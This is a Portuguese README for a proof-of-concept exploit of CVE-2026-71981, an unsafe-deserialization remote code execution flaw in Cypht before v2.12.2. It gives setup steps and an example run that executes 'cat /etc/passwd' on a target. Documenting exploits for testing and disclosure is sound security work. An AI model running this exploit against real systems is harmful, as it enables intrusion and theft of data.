
Prova de conceito de exploit para CVE-2026-71981, uma RCE por desserialização insegura no Cypht. Executa comandos e imprime a saída via resposta de logout. Requer phpggc para geração do payload.
Este é um PoC para a CVE-2026-71981, RCE por desserialização insegura. O resultado do comando executado é exibido na resposta da solicitação de logout após as tags </body></html>. Use --print-all para também exibir toda a resposta.
Versões vulneráveis: < v2.12.2
Este script requer o https://github.com/ambionics/phpggc instalado para gerar os payloads de unserialize().
Configuração e exemplo:
python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt
python3 ./poc.py --ip 127.0.0.1 --username admin --password admin --command "cat /etc/passwd"
python3 ./poc.py --help